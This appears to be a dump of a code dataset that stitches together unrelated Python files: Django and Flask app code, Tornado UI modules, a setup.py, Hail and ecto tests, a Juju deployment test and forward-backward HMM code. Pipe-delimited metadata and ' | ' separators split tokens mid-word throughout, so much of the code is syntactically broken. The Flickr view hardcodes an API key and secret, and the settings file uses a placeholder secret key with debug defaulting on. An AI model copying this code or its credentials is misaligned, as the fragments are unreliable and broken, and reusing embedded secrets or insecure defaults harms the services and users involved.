execute_from_command_line(sys.argv)
|
julython/julython.org | july/settings.py | Python | mit | 8,557 | 0 | import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.core.exceptions import SuspiciousOperation
# Default settings that can be overwritten in secrets
DEBUG = True
SECRET_KEY = 'foobar'
DATABASE_ENGINE = 'django.db.backends.sqlite3'
DATABASE_NAME = 'julython.db'
DATABASE_PASSWORD = ''
DATABASE_SERVER = ''
DATABASE_USER = ''
LOGFILE_PATH = os.path.expanduser('~/julython.log')
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
GITHUB_CONSUMER_KEY = ''
GITHUB_CONSUMER_SECRET = ''
GITHUB_APP_ID = GITHUB_CONSUMER_KEY
GITHUB_API_SECRET = GITHUB_CONSUMER_SECRET
EMAIL_HOST = '127.0.0.1'
EMAIL_PORT = '1025'
try:
DEBUG = False
from secrets import *
except ImportError:
DEBUG = True
if DEBUG:
import warnings
warnings.filterwarnings(
'error', r"DateTimeField received a naive datetime",
RuntimeWarning, r'django\.db\.models\.fields')
CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DEBUG = DEBUG
DEFAULT_FROM_EMAIL = 'Julython <mail@julython.org>'
SERVER_EMAIL = 'Julython <mail@julython.org>'
ADMINS = (
('Robert Myers', 'robert@julython.org'),
)
INTERNAL_IPS = ['127.0.0.1', 'localhost']
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': DATABASE_ENGINE,
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
'HOST': DATABASE_SERVER,
'PORT': '',
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# Timezone Support
USE_TZ = True
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(CURRENT_DIR, '..', 'static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(CURRENT_DIR, 'static'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'july.middleware.AbuseMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
)
DEBUG_TOOLBAR_CONFIG = {
'ENABLE_STACKTRACES': True,
}
ROOT_URLCONF = 'july.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates"
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'july',
'july.game',
'july.people',
'july.blog',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.contenttypes',
'debug_toolbar',
'social_auth',
'south',
)
AUTHENTICATION_BACKENDS = [
'july.auth.twitter.TwitterBackend',
'july.auth.github.GithubBackend',
'django.contrib.auth.backends.ModelBackend',
]
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
SESSION_SAVE_EVERY_REQUEST = True
# Django 1.5 Custom User Model !! ftw
AUTH_USER_MODEL = 'july.User'
SOCIAL_AUTH_USER_MODEL = AUTH_USER_MODEL
SOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'
SOCIAL_AUTH_UUID_LENGTH = 3
SOCIAL_AUTH_PROTECTED_USER_FIELDS = ['email', 'location', 'url', 'description']
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_a | ssociate_complete'
SOCIAL_AUTH_PIPELINE = [
'july.auth.social.social_auth_user',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
| 'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
]
# Just so we can use the same names for variables - why different social_auth??
GITHUB_APP_ID = GITHUB_CONSUMER_KEY
GITHUB_API_SECRET = GITHUB_CONSUMER_SECRET
GITHUB_EXTENDED_PERMISSIONS = ['user', 'public_repo']
TWITTER_EXTRA_DATA = [('screen_name', 'screen_name')]
ABUSE_LIMIT = 3
def skip_suspicious_ops(record):
"""Skip any errors with spoofed headers.
ticket: https://code.djangoproject.com/ticket/19866
"""
if record.exc_info:
exc_type, exc_value = record.exc_info[:2]
if isinstance(exc_value, SuspiciousOperation):
return False
return True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'skip_suspicious_ops': {
'()': 'django.utils.log.CallbackFilter',
'callback': skip_suspicious_ops,
},
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'simple',
'maxBytes': 100000000,
'backupCount': 3,
'filename': LOGFILE_PATH,
},
'mail_admins': {
'level': 'ERROR',
'filters': ['skip_suspicious_ops', 'require_debug_false'], |
pythononwheels/copow | uimodules/copow_ui_modules.py | Python | apache-2.0 | 3,272 | 0.005501 | #
# copow ui modules.
#
# see: http://tornado.readthedocs.org/en/latest/overview.html#ui-modules
#
# remark: wheneer I say "nice" in this module it's purely subjective to me ;)
#
import tornado.web
import #A | PPNAME.config.settings
class SimplePagination(tornado.web.UIModule):
"""
| Renders a nice html selection list from
given model entries
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, page=None, count=None):
pages = count / atest.config.settings.pagination["per_page"]
return self.render_string(
"uimodules/simple_pagination.html", model=model, current_page=page, num_pages=num_pages)
class FormSelect(tornado.web.UIModule):
"""
Renders a nice html selection list from
given model entries
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_select.html", model=model, attribute=attribute, value="")
class FormTextInput(tornado.web.UIModule):
"""
Renders a nice html textfield
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_textinput.html", model=model, attribute=attribute, value="")
class FormTextArea(tornado.web.UIModule):
"""
Renders a nice html text area
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_textarea.html", model=model, attribute=attribute, value="")
class FormFileSelect(tornado.web.UIModule):
"""
Renders a nice html Files selector
Shows the specified model.attribute as selector.
Default is _id (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_fileselect.html", model=model, attribute=attribute, value="")
class FormDatePicker(tornado.web.UIModule):
"""
Renders a nice html Date picker
Shows the specified model.attribute as selector.
Default is powlib.gettime(_id) (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_datepicker.html", model=model, attribute=attribute, value="")
class FormCheckBox(tornado.web.UIModule):
"""
Renders a nice html checkbox
Shows the specified model.attribute as selector.
Default is powlib.gettime(_id) (Which is probably something you want to change ;)
"""
def render(self, model=None, attribute="_id"):
return self.render_string(
"uimodules/form_checkbox.html", model=model, attribute=attribute, value="") |
afisher1/volttron-applications | nrel/agents/RadioThermostatDriverRelayAgent/radiothermostatdriverrelay/settings.py | Python | bsd-3-clause | 23 | 0 |
HEART | BEAT_PERIOD | = 20
|
sdss/marvin | python/marvin/web/controllers/__init__.py | Python | bsd-3-clause | 2,791 | 0.000358 | # !usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
# @Author: Brian Cherinka
# @Date: 2016-12-08 14:24:58
# @Last modified by: Brian Cherinka
# @Last Modified time: 2018-07-13 18:21:26
from __future__ import print_function, division, absolute_import
from flask_classful import FlaskView
from flask import request, current_app, session as current_session
from marvin.web.web_utils import parseSession, update_allowed, updateGlobalSession
from marvin.web.web_utils import check_access, check_request_for_release
import marvin
from brain.utils.general import build_routemap
from marvin.api.base import arg_validate as av
class BaseWebView(FlaskView):
''' This is the Base Web View for all pages '''
def __init__(self, page):
self.base = {}
self.base['intro'] = 'Welcome to Marvin!'
self.base['version'] = marvin.__version__
self.update_title(page)
self._endpoint = self._release = None
self._drpver = self._dapver = None
def before_request(self, *args, **kwargs):
''' this runs before every single request '''
# check Flask request for release info but only when no session
if 'release' not in current_session:
check_request_for_release(request)
# check login/access status and update global session
check_ | access()
updateGlobalSession()
self.base['error'] = None
self._logged_in = current_session.get('loginre | ady', False)
self._versions = update_allowed()
self._endpoint = request.endpoint
self._drpver, self._dapver, self._release = parseSession()
# try to get a local version of the urlmap for the arg_validator
if not av.urlmap:
urlmap = build_routemap(current_app)
marvin.config.urlmap = urlmap
av.urlmap = urlmap
def after_request(self, name, response):
''' this runs after every single request '''
return response
def update_title(self, page):
''' Update the title and page '''
self.base['title'] = page.title().split('-')[0] if 'main' in page \
else page.title().replace('-', ' | ')
self.base['page'] = page
def reset_dict(self, mydict, exclude=None):
''' resets the page dictionary '''
mydict['error'] = self.base['error']
exclude = exclude if isinstance(exclude, list) else [exclude]
diffkeys = set(mydict) - set(self.base)
for key, val in mydict.items():
if key in diffkeys and (key not in exclude):
mydict[key] = '' if isinstance(val, str) else None
mydict['versions'] = self._versions
mydict['release'] = self._release
mydict['loggedin'] = self._logged_in
|
sanguillon/voprov | setup.py | Python | mit | 1,855 | 0.001078 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
fr | om codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encod | ing='utf-8') as f:
readme = f.read()
requirements = [
'prov>=1.5.3',
]
test_requirements = [
'pydot>=1.2.0'
]
setup(
name='voprov',
version='0.0.2',
description='A library for IVOA Provenance Data Model supporting PROV-JSON, '
'PROV-XML and PROV-N',
long_description=readme,
author='Jean-Francois Sornay',
author_email='jeanfrancois.sornay@gmail.com',
url='https://github.com/sanguillon/voprov/',
packages=find_packages(),
include_package_data=True,
install_requires=requirements,
extras_require={
'dot': ['pydot>=1.2.0'],
},
license="MIT",
zip_safe=False,
keywords=[
'provenance', 'graph', 'model', 'VOPROV', 'provenance-dm', 'PROVENANCE-DM', 'PROV-JSON', 'JSON',
'PROV-XML', 'PROV-N'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: French',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Information Analysis',
],
tests_require=test_requirements,
python_requires='>=2',
)
|
ethanrublee/ecto-release | test/scripts/test_If.py | Python | bsd-3-clause | 2,018 | 0.004955 | #!/usr/bin/env python
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY D | IRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, O | R PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import ecto
import ecto_test
def test_If():
plasm = ecto.Plasm()
g = ecto_test.Generate("Generator", step=1.0, start=1.0)
If = ecto.If(cell=g)
truer = ecto.TrueEveryN(n=3,count=3)
plasm.connect(truer['flag'] >> If['__test__']
)
plasm.execute(niter=27)
assert g.outputs.out == 9 #should have only called execute 9 times.
if __name__ == '__main__':
test_If()
|
danking/hail | hail/python/test/hail/matrixtable/test_grouped_matrix_table.py | Python | mit | 12,704 | 0.007006 | import unittest
import hail as hl
from ..helpers import *
setUpModule = startTestHailContext
tearDownModule = stopTestHailContext
class Tests(unittest.TestCase):
@staticmethod
def get_groupable_matrix():
rt = hl.utils.range_matrix_table(n_rows=100, n_cols=20)
rt = rt.annotate_globals(foo="foo")
rt = rt.annotate_rows(group1=rt['row_idx'] % 6,
group2=hl.Struct(a=rt['row_idx'] % 6,
b="foo"))
rt = rt.annotate_cols(group3=rt['col_idx'] % 6,
group4=hl.Struct(a=rt['col_idx'] % 6,
b="foo"))
return rt.annotate_entries(c=rt['row_idx'],
d=rt['col_idx'],
e="foo",
f=rt['group1'],
g=rt['group2']['a'],
h=rt['group3'],
i=rt['group4']['a'])
@staticmethod
def get_groupable_matrix2():
mt = hl.utils.range_matrix_table(4, 4)
mt = mt.annotate_globals(glob=5)
mt = mt.annotate_rows(r1=3)
mt = mt.annotate_cols(c1=3)
mt2 = hl.utils.range_matrix_table(4, 4)
mt2 = mt2.annotate_entries(x=mt2.row_idx + mt2.col_idx)
mt2 = mt2.annotate_rows(row_idx2=mt2.row_idx)
mt2 = mt2.annotate_cols(col_idx2=mt2.col_idx)
mt2 = mt2.annotate_globals(global_field=6)
return mt, mt2
def test_errors_caught_correctly(self):
from hail.expr.expressions import ExpressionException
mt = self.get_groupable_matrix()
self.assertRaises(ExpressionException, mt.group_rows_by, mt['group1'] + 1)
self.assertRaises(ExpressionException, mt.group_cols_by, mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, mt['group3'] + 1)
self.assertRaises(ExpressionException, mt.group_rows_by, mt['group3'])
self.assertRaises(ExpressionException, mt.group_rows_by, group3=mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, group1=mt['group3'])
self.assertRaises(ExpressionException, mt.group_rows_by, foo=mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, foo=mt['group3'])
a = mt.group_rows_by(group5=(mt['group2']['a'] + 1))
self.assertRaises(NotImplementedError, a.aggregate_cols, bar=hl.agg.sum(mt['col_idx'])) # cannot aggregate cols when grouped by rows
self.assertRaises(ExpressionException, a.aggregate_entries, group3=hl.agg.sum(mt['c'])) # duplicate column field
self.assertRaises(ExpressionException, a.aggregate_entries, group5=hl.agg.sum(mt['c'])) # duplicate row field
self.assertRaises(ExpressionException, a.aggregate_entries, foo=hl.agg.sum(mt['c'])) # duplicate globals field
self.assertRaises(ExpressionException, a.aggregate_rows, group3=hl.agg.sum(mt['row_idx'])) # duplicate column field
self.assertRaises(ExpressionException, a.aggregate_rows, group5=hl.agg.sum(mt['row_idx'])) # duplicate row field
self.assertRaises(ExpressionException, a.aggregate_rows, foo=hl.agg.sum(mt['row_idx'])) # duplicate globals field
self.assertRaises(ExpressionException, a.aggregate_rows, bar=mt['row_idx'] + hl.agg.sum(mt['row_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, a.aggregate_rows, bar=mt['col_idx'] + hl.agg.sum(mt['row_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, a.aggregate_rows, bar=hl.agg.sum(mt['c'])) # aggregation scope is rows only - entry field
self.assertRaises(ExpressionException, a.aggregate_rows, bar=hl.agg.sum(mt['col_idx'])) # aggregation scope is rows only - column field
b = mt.group_cols_by(group5=(mt['group4']['a'] + 1))
self.assertRaises(NotImplementedError, b.aggregate_rows, bar=hl.agg.sum(mt['row_idx'])) # cannot aggregate rows when grouped by cols
self.assertRaises(ExpressionException, b.aggregate_entries, group1=hl.agg.sum(mt['c'])) # duplicate row field
self.assertRaises(ExpressionException, b.aggregate_entries, group5=hl.agg.sum(mt['c'])) # duplicate column field
self.assertRaises(ExpressionException, b.aggregate_entries, foo=hl.agg.sum(mt['c'])) # duplicate globals field
self.assertRaises(ExpressionException, b.aggregate_cols, group1=hl.agg.sum(mt['col_idx'])) # duplicate row field
self.assertRaises(ExpressionException, b.aggregate_cols, group5=hl.agg.sum(mt['col_idx'])) # duplicate column field
self.assertRaises(ExpressionException, b.aggregate_cols, foo=hl.agg.sum(mt['col_idx'])) # duplicate globals field
self.assertRaises(ExpressionException, b.aggregate_cols, bar=mt['col_idx'] + hl.agg.sum(mt['col_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, b.aggregate_cols, bar=mt[ | 'row_idx'] + hl.agg.sum(mt['col_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, b.aggregate_cols, bar=hl.agg.sum(mt['c'])) # aggregation scope is cols only - entry field
self.assertRaises(ExpressionException, b.aggregate_cols, bar=hl.agg.sum(mt['row_idx'])) # aggregation scope is cols onl | y - row field
c = mt.group_rows_by(group5=(mt['group2']['a'] + 1)).aggregate_rows(x=hl.agg.count())
self.assertRaises(ExpressionException, c.aggregate_rows, x=hl.agg.count()) # duplicate field
d = mt.group_cols_by(group5=(mt['group4']['a'] + 1)).aggregate_cols(x=hl.agg.count())
self.assertRaises(ExpressionException, d.aggregate_cols, x=hl.agg.count()) # duplicate field
def test_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(mt['group1']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('group1' in a.row_key)
b = mt.group_cols_by(mt['group3']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('group3' in b.col_key)
def test_nested_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(mt['group2']['a']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('a' in a.row_key)
b = mt.group_cols_by(mt['group4']['a']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('a' in b.col_key)
def test_named_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(group5=(mt['group2']['a'] + 1)).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('group5' in a.row_key)
b = mt.group_cols_by(group5=(mt['group4']['a'] + 1)).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('group5' in b.col_key)
def test_joins_work_correctly(self):
mt, mt2 = self.get_groupable_matrix2()
col_result = (mt.group_cols_by(group=mt2.cols()[mt.col_idx].col_idx2 < 2)
.aggregate(sum=hl.agg.sum(mt2[mt.row_idx, mt.col_idx].x + mt.glob) + mt.glob - 15)
.drop('r1'))
col_expected = (
hl.Table.parallelize(
[{'row_idx': 0, 'group': True, 'sum': 1},
{'row_idx': 0, 'group': False, 'sum': 5},
{'row_idx': 1, 'group': True, 'sum': 3},
{'row_idx': 1, 'group': False, 'sum': 7},
{'row_idx': 2, 'group': True, 'sum': 5},
{'row_idx': 2, 'group': False, 'sum': 9},
{'row_idx': 3, 'group': True, 'sum': 7},
{'row_idx': 3, 'group': False, 'sum': 11}],
hl.tstruct(row_idx=hl.tint32, group=hl.tbool, sum=hl.tint64)
).annotate_globals(glob=5).key_by('row_idx', 'group')
)
self.assertTrue(col_result.entries()._same(col_expected))
row_result = (mt. |
welikecloud/bigtop | bigtop-packages/src/charm/mahout/layer-mahout/tests/01-mahout-test.py | Python | apache-2.0 | 2,393 | 0.000418 | #!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# l | imitations under the License.
import unittest
import amulet
class TestDeploy(unittest.TestCase):
"""
Deployment and smoke test for Apache Bigtop Mahout.
| """
@classmethod
def setUpClass(cls):
cls.d = amulet.Deployment(series='xenial')
cls.d.add('mahout')
cls.d.add('client', charm='hadoop-client')
cls.d.add('namenode', charm='hadoop-namenode')
cls.d.add('resourcemanager', charm='hadoop-resourcemanager')
cls.d.add('slave', charm='hadoop-slave')
cls.d.add('plugin', charm='hadoop-plugin')
cls.d.relate('plugin:hadoop-plugin', 'client:hadoop')
cls.d.relate('plugin:namenode', 'namenode:namenode')
cls.d.relate('plugin:resourcemanager', 'resourcemanager:resourcemanager')
cls.d.relate('slave:namenode', 'namenode:datanode')
cls.d.relate('slave:resourcemanager', 'resourcemanager:nodemanager')
cls.d.relate('namenode:namenode', 'resourcemanager:namenode')
cls.d.relate('mahout:mahout', 'client:mahout')
cls.d.setup(timeout=3600)
cls.d.sentry.wait_for_messages({"mahout": "ready"}, timeout=3600)
cls.mahout = cls.d.sentry['mahout'][0]
def test_mahout(self):
"""
Validate Mahout by running the smoke-test action.
"""
uuid = self.mahout.run_action('smoke-test')
result = self.d.action_fetch(uuid, full_output=True)
# action status=completed on success
if (result['status'] != "completed"):
self.fail('Mahout smoke-test failed: %s' % result)
if __name__ == '__main__':
unittest.main()
|
xurichard/mysite | photos/views.py | Python | mit | 753 | 0.022576 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from .models import *
import requests
import json
user_id = '139169754@N02'
api_key = ' | 41dd3aff041c00c52febdef9786a9ca0'
api_secret = '0f5a3b5047f760f7'
def index(request):
context = {}
context['photos'] = []
method = 'flickr.people.getPublicPhotos'
query = 'https://api.flickr.com/services/rest/?&method=%s&api_key=%s&user_id=%s&format=json&nojsoncallback=1'%(method, api_key, user_id)
query += '&extras=url_z'
response = requests.get(query)
if response.ok:
response = json.loads(response. | text)
for link in response['photos']['photo']:
context['photos'].append(str(link['url_z']))
return render(request, 'photos/index.html', context)
|
marksantesson/xmldump | test_utils.py | Python | apache-2.0 | 2,650 | 0.017736 | # cd c:\Docs\Code\lawn
# kr *.py -r -c "python manage.py test test_utils"
import logging
import os
from django.test import TestCase
from utils import LoggingFilterContext, TemporaryFileContext
cla | ss TestLoggingFilter(TestCase):
def test_filtering(self):
calls = list()
def test_fn(record):
calls.append( record )
# Outter filters are checked first.
with LoggingFilterContext( lambda record: False ):
with LoggingFilterContext( | test_fn ):
logging.error('pass')
with LoggingFilterContext( lambda record: True ):
with LoggingFilterContext( test_fn ):
logging.error('fail')
self.assertEquals( ['fail'], [x.msg for x in calls])
def test_filtering_annotate(self):
calls = list()
@LoggingFilterContext.annotate(lambda rec: rec.msg=='pass')
def test_fn(record):
calls.append( record )
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('pass')
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('fail')
self.assertEquals( ['pass'], [x.msg for x in calls])
def test_filtering_annotate_regex(self):
calls = list()
@LoggingFilterContext.annotate_regex('.*pass$')
def test_fn(record):
calls.append( record )
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('pass')
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('fail')
self.assertEquals( ['pass'], [x.msg for x in calls])
def test_filtering_annotate_not_regex(self):
calls = list()
@LoggingFilterContext.annotate_not_regex('.*fail$')
def test_fn(record):
calls.append( record )
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('pass')
with test_fn.logging_filter:
with LoggingFilterContext( test_fn ):
logging.warn('fail')
self.assertEquals( ['pass'], [x.msg for x in calls])
class TestTemporaryFileContext(TestCase):
def test_file_is_removed(self):
contents = 'asd'
with TemporaryFileContext(contents) as tempfile:
fname = tempfile.fileName()
self.assertTrue( os.access(fname, os.R_OK) )
self.assertEquals( contents, open(fname).read() )
self.assertFalse( os.access(fname, os.R_OK) )
|
ramon-astudillo/lxmls-toolkit | lxmls/sequences/bak/forward_backward.py | Python | mit | 8,281 | 0.00157 | import numpy as np
# ----------
# Computes the forward backward trellis for a given sequence.
# N - Length of sequence
# H - Number of hidden states
# Receives:
# Node potentials (N,H) vector
# Edge potentials (N-1,H,H)
#
# Emission probabilities: (length, num_states) array
# Initial probabilities: (num_states) array
# Transition probabilities: (length, num_states+1, num_states) array
#
# OR
#
# Transition probabilities: (length-1, num_states, num_states) array
# Final probabilities: (num_states) array
# ----------
def run_forward(initial_scores, transition_scores, final_scores, emission_scores):
length = np.size(emission_scores, 0) # Length of the sequence.
num_states = np.size(initial_scores) # Number of states.
# Forward variables.
forward = np.zeros([length, num_states])
# Initialization.
forward[0, :] = emission_scores[0, :] * initial_scores
# Forward loop.
for pos in xrange(1, length):
for current_state in xrange(num_states):
forward[pos, current_state] = \
np.sum(forward[pos-1, :] * transition_scores[pos-1, current_state, :])
forward[pos, current_state] *= emission_scores[pos, current_state]
# Termination.
likelihood = sum(forward[length-1, :] * final_scores)
# print 'Likelihood =', likelihood
return likelihood, forward
def run_backward(initial_scores, transition_scores, final_scores, emission_scores):
length = np.size(emission_scores, 0) # Length of the sequence.
num_states = np.size(initial_scores) # Number of states.
# Backward variables.
backward = np.zeros([length, num_states])
# Initialization.
backward[length-1, :] = final_scores
# Backward loop.
for pos in xrange(length-2, -1, -1):
for current_state in xrange(num_states):
backward[pos, current_state] = \
sum(backward[pos+1, :] *
transition_scores[pos, :, current_state] *
emission_scores[pos+1, :])
# prob = 0.0
# for next_state in xrange(num_states):
# back = backward[pos+1, next_state]
# trans = transition_scores[pos, next_state, current_state];
# observation = emission_scores[pos+1, next_state];
# prob += trans * observation * back;
# backward[pos, current_state] = prob
# backward[0,:] *= initial_scores
# sanity_check_forward_backward(forward,backward)
# Termination.
likelihood = sum(backward[0, :] * initial_scores*emission_scores[0, :])
# print 'Likelihood =', likelihood
return likelihood, backward
def forward_backward(initial_scores, transition_scores, final_scores, emission_scores):
likelihood, forward = run_forward(initial_scores, transition_scores, final_scores, emission_scores)
print 'Likelihood =', likelihood
likelihood, backward = run_backward(initial_scores, transition_scores, final_scores, emission_scores)
print 'Likelihood =', likelihood
# length = np.size(emission_scores, 0) # Length of the sequence.
# num_states = np.size(initial_scores) # Number of states.
#
# forward = np.zeros([length, num_states])
# backward = np.zeros([length, num_states])
#
# forward[0,:] = emission_scores[0,:] * initial_scores
# # Forward loop.
# for pos in xrange(1,length):
# for current_state in xrange(num_states):
# for prev_state in xrange(num_states):
# forward_v = forward[pos-1, prev_state]
